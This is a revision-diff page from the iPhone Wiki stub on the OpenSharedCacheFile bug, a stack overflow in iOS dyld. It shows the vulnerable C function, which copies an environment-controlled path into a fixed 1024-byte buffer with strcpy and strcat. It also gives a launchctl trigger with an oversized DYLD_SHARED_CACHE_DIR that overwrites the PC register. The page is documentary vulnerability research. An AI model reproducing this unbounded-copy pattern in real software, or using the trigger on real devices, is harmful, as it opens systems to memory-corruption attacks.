Difference between revisions of "OpenSharedCacheFile"

From The iPhone Wiki
Jump to: navigation, search
m (Grammar dude! Stub too.)
m (No s)
Line 4: Line 4:
 
{
 
{
 
char path[1024];
 
char path[1024];
strcpy(path, sSharedCacheDir);
+
strcpy(path, SharedCacheDir);
 
strcat(path, "/");
 
strcat(path, "/");
 
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
 
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);

Revision as of 22:09, 23 March 2015

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.

Opensharedcachefile() function

int openSharedCacheFile()
{
  char path[1024];
  strcpy(path, SharedCacheDir);
  strcat(path, "/");
  strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
  return ::open(path, O_RDONLY);
}

Triggering the vuln

To trigger it, run the following

DYLD_SHARED_CACHE_DIR = “A” * 2000 \
DYLD_SHARED_REGION = private /bin/launchctl

This will overflow the PC register making it a stack overflow.

Apple-logo.png This article is a "stub", an incomplete page. Please add more content to this article and remove this tag.